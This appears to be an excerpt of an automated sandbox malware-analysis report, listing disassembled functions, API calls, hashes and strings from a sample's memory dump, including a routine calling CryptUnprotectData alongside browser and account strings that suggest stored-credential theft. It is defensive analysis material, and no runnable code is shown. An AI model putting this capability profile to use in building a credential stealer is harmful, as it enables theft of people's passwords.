                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                      • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3655998216-0
                                                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                      • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                      • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                      • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00445426
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 1828521557-0
                                                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                      APIs
                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 609303285-0
                                                                                      • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                      • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp
                                                                                      • String ID:
                                                                                      • API String ID: 2081463915-0
                                                                                      • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                      • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                      APIs
                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 2136311172-0
                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                      APIs
                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@
                                                                                      • String ID:
                                                                                      • API String ID: 1936579350-0
                                                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                      APIs
                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3604893535-0
                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                      APIs
                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1213725291-0
                                                                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                      • free.MSVCRT ref: 00418370
                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                      • String ID: OsError 0x%x (%u)
                                                                                      • API String ID: 2360000266-2664311388
                                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1865533344-0
                                                                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                      APIs
                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                      • API String ID: 2929817778-1134094380
                                                                                      • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                      • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                      APIs
                                                                                      Strings
